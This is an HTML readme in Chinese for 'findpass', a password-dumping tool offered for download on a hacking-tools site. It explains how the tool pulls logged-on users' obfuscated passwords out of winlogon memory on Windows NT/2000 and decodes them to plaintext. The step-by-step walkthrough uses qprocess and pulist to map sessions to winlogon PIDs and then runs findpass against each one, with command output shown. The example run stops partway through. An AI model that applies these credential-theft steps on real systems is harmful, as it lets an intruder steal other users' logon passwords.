📄 findpass.readme.html
字号:
<html>
<head>
<meta name="Source" content="http://www.BingleSite.net/">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta name="Keywords" content="Bingle之家, 入侵检测, intrusion detection, 安全工具, security tools, 攻击程序, exploits, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全代码, security code, 安全资源, security resources, 安全编程, security program">
<title>FindPass使用说明</title>
</head>
<body bgproperties="fixed" bgcolor="#000000" text="#FFFFFF" link="#40FFFF" vlink="#80C050" alink="#80A050">
<p class=MsoNormal style='line-height:160%'>
<h2 align="center"><font color="#00CC00">FindPass使用说明</font></h2>
<p align="center">by bingle </p>
<hr size="1" noshade color="#FFFF00" width="90%">
<p class=MsoNormal style='line-height:160%' align="center">文中提到的工具可以在<a href="http://www.BingleSite.net/hacktool/passtep/findpass.rar">www.BingleSite.net</a>上下载<h3 style='line-height:160%'><font color="#00CC00"> 1. 功能</font></h3>
<p class=MsoNormal style='line-height:160%'><font face="Fixedsys">
这个工具是前年我从</font><font face="Fixedsys">http://www.smidgeonsoft.com/</font><font face="Fixedsys">的PasswordReminder改来了,PasswordReminder只能查找自己在内存中的密码,后来我简单修改了一下,因为登陆的域名和用户名是明文存储在winlogon进程里的,findpass 通过在winlogon进程中查找用户登陆信息来获取简单加密后的用户密码,进而破解获得明文密码。<br>
<br>
findpass
只能获得所有图形登陆的用户密码(本地登陆和终端服务),而telnet等不行。目前只能用于WindowsNT和Windows
2000系统。</font><p class=MsoNormal style='line-height:160%'><font face="Fixedsys">一个偶然的机会,我居然看到为这个工具作的一个动画教程,看来是比较难用把,我想它还是有点用的,所有把它的用法作了这个详细的教程。</font><h3 style='line-height:160%'><font face="Fixedsys"><br>
</font><font color="#00CC00">2. 使用方法</font></h3>
<p class=MsoNormal style='line-height:160%'><font face="Fixedsys">findpass.exe
[DomainName] [UserName] [PID-of-WinLogon]<br>
<br>
如果系统只有一个用户图形登陆,可以不需要参数。<br>
<br>
如果有多个登陆会话,因为每个图形登陆都由一个winlogon进程负责,因此需要提供域名/登陆用户名/winlogon进程的pid作为参数,否则可能无法找到密码,这些参数信息的获得有2种途径:<br>
<br>
<font color="#00CC00">(1) </font>如果你可以使用该机的windows任务管理器,让它显示pid、用户名和会话id,这样每个会话id都包含唯一一个winlogon进程,如果该会话有用户登陆,那么你也可以看到这个会话的登陆用户。<br>
<br>
<font color="#00CC00">(2)</font> 另外,这些信息都可以从pulist的输出中获得。不过因为pulist并没有显示会话id,我们就不知道哪个winlogon是负责哪个用户登陆的,因此必须把每个winlogon和每个用户轮流试验才行。<br>
<br>
你也可以使用QProcess来获得进程的会话id,QProcess.exe是随win2000的终端服务一起安装在系统里的,一般使用Query.exe来调用它(Query.exe还可以获得其他一些信息),不过我们还是直接使用QProcess,QProcess和pslist类似,不过可以列出我们需要的会话信。</font><h3 style='line-height:160%'><font face="Fixedsys"><br>
</font><font color="#00CC00">3. 用法举例 </font></h3>
<p style='line-height:160%'><font face="Fixedsys"><font color="#00CC00">(1) 使用windows的任务管理器<br>
</font><font color="#00CC00">1)</font> 启动任务管理器,选择显示所有用户的进程,然后在'查看'菜单-->'选择列'下选择:pid、会话id、用户名。<br>
<font color="#00CC00">2)</font> 就会看到进程列表,点会话id,使其按会话id排序,就和下边显示的类似了。</font><p style='line-height:160%' align="center"><font face="Fixedsys"><img border="0" src="taskmgr-findpass.JPG" width="404" height="571"></font><p style='line-height:160%'><font face="Fixedsys"><font color="#00CC00">3)</font> 会话0,是本地登陆会话,都是system用户,说明没有用户登陆;会话1有用户administrator登陆;而会话2有bingle登陆。<br>
<font color="#00CC00">4)</font> 于是可以使用如下命令findpass domain administrator 1128查看会话1的用户密码,findpass domain bingle 444查看会话2的用户密码了。域名还是要用一下pulist、tokenInfor或者其他工具。<br>
<br>
<br>
<font color="#00CC00">(2) 使用QProcess<br>
1) </font> 使用qprocess 列出所有winlogon.exe 的会话id和winlogon进程id,<br>
<font color="#00CC00">2)</font> 使用qprocess
获得所有已经登陆的用户和这些用户的会话id<br>
<font color="#00CC00">3)</font> 使用TokenInfor或者pulist查看各会话登陆域名<br>
<font color="#00CC00">4)</font> 用findpass与之前获得的相应信息获得各登陆会话的用户密码。</font><p style='line-height:160%'><font face="Fixedsys">
<font color="#80C050">*** 先来试试运气<br>
</font>C:\Documents and Settings\bingle>findpass<br>
To Find Password in the Winlogon process<br>
Usage: FindPass.exe DomainName UserName PID-of-WinLogon<br>
<br>
The debug privilege has been added to PasswordReminder.<br>
The WinLogon process id is 248 (0x000000f8).<br>
To find BINGLESITE\bingle password in process 248 ...<br>
PasswordReminder is unable to find the password in memory.<br>
<font color="#80C050">*** 运气不佳
</font></font><p style='line-height:160%'><font face="Fixedsys"><font color="#80C050">***
先来看看qprocess 的帮助<br>
</font>C:\Documents and Settings\bingle>qprocess /?<br>
显示有关进程的信息。<br>
<br>
QUERY PROCESS [* | processid | username | sessionname | /ID:nn | programname]<br>
[/SERVER:servername] [/SYSTEM]<br>
<br>
* 显示所有可见进程。<br>
processid 显示 processid 指定的进程。<br>
username 显示所有属于 username 的进程。<br>
sessionname 显示所有在 sessionname 运行的进程。<br>
/ID:nn 显示所有在会话 nn 处运行的进程。<br>
programname 显示所有跟 programname 相关进程。<br>
/SERVER:servername 要查询的终端服务器。<br>
/SYSTEM 显示系统进程的进程信息。<br>
<font color="#80C050">*** 先来看看qprocess 的帮助,qprocess
的第一个参数可以是进程id、用户名、会话名、会话id、进程名或者*(全部用户进程,不包括系统进程)。第二个参数指定要查询的远程服务器,第二个参数指定查看系统进程。<br>
</font></font><p style='line-height:160%'>
<font color="#80C050">*** </font><font face="Fixedsys"><font color="#80C050">1) 使用qprocess
列出所有 winlogon.exe 的会话id和winlogon进程id,<br>
</font>C:\Documents and Settings\bingle>qprocess winlogon.exe /system<br>
USERNAME SESSIONNAME ID PID IMAGE<br>
system console 0 248 winlogon.exe<br>
system rdp-tcp#7 1 1128 winlogon.exe<br>
>system rdp-tcp#12 2 1260 winlogon.exe<br>
</font>
<font color="#80C050">*** 共有3个会话</font><p style='line-height:160%'>
<font color="#80C050">*** </font><font face="Fixedsys"><font color="#80C050">2) 使用qprocess
获得所有已经登陆的用户和这些用户的会话id</font><br>
C:\Documents and Settings\bingle>qprocess *<br>
USERNAME SESSIONNAME ID PID IMAGE<br>
administrator rdp-tcp#7 1 412 rdpclip.exe<br>
administrator rdp-tcp#7 1 964 explorer.exe<br>
administrator rdp-tcp#7 1 896 daemon.exe<br>
administrator rdp-tcp#7 1 792 conime.exe<br>
administrator rdp-tcp#7 1 496 btdownloadgui.e<br>
administrator rdp-tcp#7 1 1020 taskmgr.exe<br>
administrator rdp-tcp#7 1 1320 editplus.exe<br>
administrator rdp-tcp#7 1 1244 dexplore.exe<br>
administrator rdp-tcp#7 1 724 mdm.exe<br>
administrator rdp-tcp#7 1 916 cmd.exe<br>
administrator rdp-tcp#7 1 1368 shareaza.exe<br>
>bingle rdp-tcp#12 2 1348 rdpclip.exe<br>
>bingle rdp-tcp#12 2 708 explorer.exe<br>
>bingle rdp-tcp#12 2 1508 daemon.exe<br>
>bingle rdp-tcp#12 2 1404 realsched.exe<br>
>bingle rdp-tcp#12 2 1412 internat.exe<br>
>bingle rdp-tcp#12 2 1724 cmd.exe<br>
>bingle rdp-tcp#12 2 1452 conime.exe<br>
>bingle rdp-tcp#12 2 1576 notepad.exe<br>
>bingle rdp-tcp#12 2 1552 qprocess.exe<br>
</font><font color="#80C050">
<font face="Fixedsys">*** 会话0是本地登陆,没有用户登陆;1是</font></font><font face="Fixedsys"><font color="#80C050">administrator终端登陆;2是bingle终端登陆<br>
</font></font><p style='line-height:160%'><font color="#80C050">
<font face="Fixedsys">*** </font></font><font face="Fixedsys"><font color="#80C050">3) 使用TokenInfor或者pulist查看登陆域名<br>
</font>C:\Documents and Settings\bingle>pulist<br>
smss.exe 160 NT AUTHORITY\SYSTEM<br>
cmd.exe 916 BINGLESITE\Administrator<br>
pulist.exe 2024 BINGLESITE\bingle</font><p style='line-height:160%'><font color="#80C050">
<font face="Fixedsys">*** 两个会话的登陆域都是</font><font face="Fixedsys">BINGLESITE</font></font><p style='line-height:160%'><font color="#80C050">
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -